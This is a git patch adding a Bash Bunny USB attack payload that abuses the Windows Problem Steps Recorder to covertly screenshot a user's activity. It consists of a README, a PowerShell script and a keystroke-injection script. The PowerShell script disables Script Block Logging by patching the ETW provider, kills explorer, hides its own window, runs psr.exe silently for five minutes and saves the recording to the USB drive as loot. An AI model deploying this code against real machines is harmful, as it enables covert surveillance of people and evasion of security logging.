From 5e95ba3d4060b1eb579d590d32b95c695f097f04 Mon Sep 17 00:00:00 2001 From: TW-D <75358550+TW-D@users.noreply.github.com> Date: Fri, 28 Jan 2022 12:53:24 -0500 Subject: [PATCH] Add Win_ProblemStepsRecorder (#488) Abuse of "Windows Problem Steps Recorder" to spy on a user's activities. --- .../win_problemstepsrecorder/README.md | 29 ++++++ .../win_problemstepsrecorder/payload.ps1 | 50 ++++++++++ .../win_problemstepsrecorder/payload.txt | 91 +++++++++++++++++++ 3 files changed, 170 insertions(+) create mode 100644 payloads/library/credentials/win_problemstepsrecorder/README.md create mode 100644 payloads/library/credentials/win_problemstepsrecorder/payload.ps1 create mode 100644 payloads/library/credentials/win_problemstepsrecorder/payload.txt diff --git a/payloads/library/credentials/win_problemstepsrecorder/README.md b/payloads/library/credentials/win_problemstepsrecorder/README.md new file mode 100644 index 00000000..be634b96 --- /dev/null +++ b/payloads/library/credentials/win_problemstepsrecorder/README.md @@ -0,0 +1,29 @@ +# "Microsoft Windows" Problem Steps Recorder + +- Title: Win_ProblemStepsRecorder +- Author: TW-D +- Version: 1.0 +- Target: Microsoft Windows +- Category: Credentials + +## Description + +1) Partially avoids "PowerShell Script Block Logging". +2) Closing of all windows. +3) Hide "PowerShell" window. +4) Abuse of "Windows Problem Steps Recorder" to spy on a user's activities. +5) Writes the file system cache to disk. +6) Safely eject. + +## Configuration + +From "payload.txt" change the values of the following constants : +```bash + +######## INITIALIZATION ######## + +readonly BB_LABEL="BashBunny" +readonly RECORDER_TIME=300 + + +``` diff --git a/payloads/library/credentials/win_problemstepsrecorder/payload.ps1 b/payloads/library/credentials/win_problemstepsrecorder/payload.ps1 new file mode 100644 index 00000000..acd1c159 --- /dev/null +++ b/payloads/library/credentials/win_problemstepsrecorder/payload.ps1 @@ -0,0 +1,50 @@ +# +# Author: TW-D +# Version: 1.0 +# + +Param ( + [String] $BB_VOLUME, + [Int] $RECORDER_TIME +) + +# Partially avoids "PowerShell Script Block Logging". +# +$etw_provider = [Ref].Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider").GetField("etwProvider", "NonPublic,Static") +$event_provider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid()) +$etw_provider.SetValue($null, $event_provider) + +# Closing of all windows. +# +Get-Process -Name "explorer" | Stop-Process + +# Hide "PowerShell" window. +# +$Script:showWindowAsync = Add-Type -MemberDefinition @" +[DllImport("user32.dll")] +public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow); +"@ -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru +$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0) | Out-Null + +If ((Test-Path -Path "C:\Windows\System32\psr.exe")) { + + $bb_loot = "${BB_VOLUME}loot\" + $computer_name = $env:COMPUTERNAME + + # Abuse of "Windows Problem Steps Recorder" to spy on a user's activities. + # + (C:\Windows\System32\psr.exe /start /sc 1 /maxsc 999 /gui 0 /sketch 1 /slides 1 /output "${bb_loot}${computer_name}_record.zip") | Out-Null + Start-Sleep -Seconds $RECORDER_TIME + (C:\Windows\System32\psr.exe /stop) | Out-Null + +} + +"Win_ProblemStepsRecorder terminated." | Out-File -FilePath .\..\..\loot\done.txt -Force + +# Writes the file system cache to disk. +# +Write-VolumeCache -DriveLetter ("${BB_VOLUME}".Substring(0,1)) + +# Safely eject. +# +(New-Object -ComObject Shell.Application).Namespace(17).ParseName("${BB_VOLUME}").InvokeVerb("Eject") \ No newline at end of file diff --git a/payloads/library/credentials/win_problemstepsrecorder/payload.txt b/payloads/library/credentials/win_problemstepsrecorder/payload.txt new file mode 100644 index 00000000..fc623c30 --- /dev/null +++ b/payloads/library/credentials/win_problemstepsrecorder/payload.txt @@ -0,0 +1,91 @@ +#!/bin/bash +# +# Title: Win_ProblemStepsRecorder +# +# Description: +# Abuse of "Windows Problem Steps Recorder" +# to spy on a user's activities. +# +# Author: TW-D +# Version: 1.0 +# Category: Credentials +# Target: Since Microsoft Windows 7 and 2008 R2 +# Attackmodes: HID and STORAGE +# +# TESTED ON +# =============== +# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1) +# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1) +# +# NOTE +# =============== +# Use the browser "Internet Explorer" to read the ".mht" file correctly. +# +# STATUS +# =============== +# Magenta solid ................................... SETUP +# Yellow single blink ............................. ATTACK +# Yellow double blink ............................. STAGE2 +# Yellow triple blink ............................. STAGE3 +# Cyan inverted single blink ...................... SPECIAL +# White fast blink ................................ CLEANUP +# Green 1000ms VERYFAST blink followed by SOLID ... FINISH + +######## INITIALIZATION ######## + +readonly BB_LABEL="BashBunny" +readonly RECORDER_TIME=300 + +######## SETUP ######## + +LED SETUP + +ATTACKMODE HID STORAGE +GET SWITCH_POSITION +udisk mount + +######## ATTACK ######## + +LED ATTACK + +Q DELAY 7000 +RUN WIN "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass" +Q DELAY 7000 + +LED STAGE2 + +Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)\"" +Q ENTER +Q DELAY 3500 + +Q STRING "\$BB_SWITCH = \"\${BB_VOLUME}payloads\\${SWITCH_POSITION}\\\"" +Q ENTER +Q DELAY 1500 + +Q STRING "CD \"\${BB_SWITCH}\"" +Q ENTER +Q DELAY 1500 + +LED STAGE3 + +Q STRING ".\payload.ps1 -BB_VOLUME \"\${BB_VOLUME}\" -RECORDER_TIME ${RECORDER_TIME}" +Q ENTER +Q DELAY 1500 + +LED SPECIAL + +until [ -f /root/udisk/loot/done.txt ]; do sleep 10; sync; done + +######## CLEANUP ######## + +LED CLEANUP + +rm /root/udisk/loot/done.txt +sync +udisk unmount + +######## FINISH ######## + +LED FINISH + +shutdown -h 0